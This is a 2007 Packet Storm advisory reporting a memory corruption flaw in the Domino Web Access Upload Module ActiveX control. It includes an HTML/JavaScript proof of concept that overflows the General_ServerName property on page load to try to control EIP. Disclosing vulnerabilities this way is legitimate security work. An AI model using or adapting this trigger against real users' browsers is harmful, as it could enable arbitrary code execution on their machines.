domino-corrupt.txt

2007-12-24T00:00:00
ID PACKETSTORM:62031
Type packetstorm
Reporter Elazar Broad
Modified 2007-12-24T00:00:00

Description

                                        
                                            `The Domino Web Access Upload Module version 7.0.34.1 seems to suffer from a memory corruption issue that may allow the execution of arbitrary code. By setting the General_ServerName property and calling the InstallBrowserHelperDll() function it MAY be possible to control the ECX register and thereby control the EIP. PoC as follows:  
  
-------------------  
<!--  
written by e.b.  
-->  
<html>  
<head>  
<script language="JavaScript" DEFER>  
function Check() {  
var s = 'A';  
  
while (s.length <= 12000) s = s + 'A';  
  
obj.General_ServerName = s;  
obj.InstallBrowserHelperDll();  
  
}  
</script>  
  
</head>  
<body onload="JavaScript: return Check();">  
<object id="obj" classid="clsid:E008A543-CEFB-4559-912F-C27C2B89F13B" />  
</object>  
</body>  
</html>   
-------------------  
  
  
Elazar  
  
`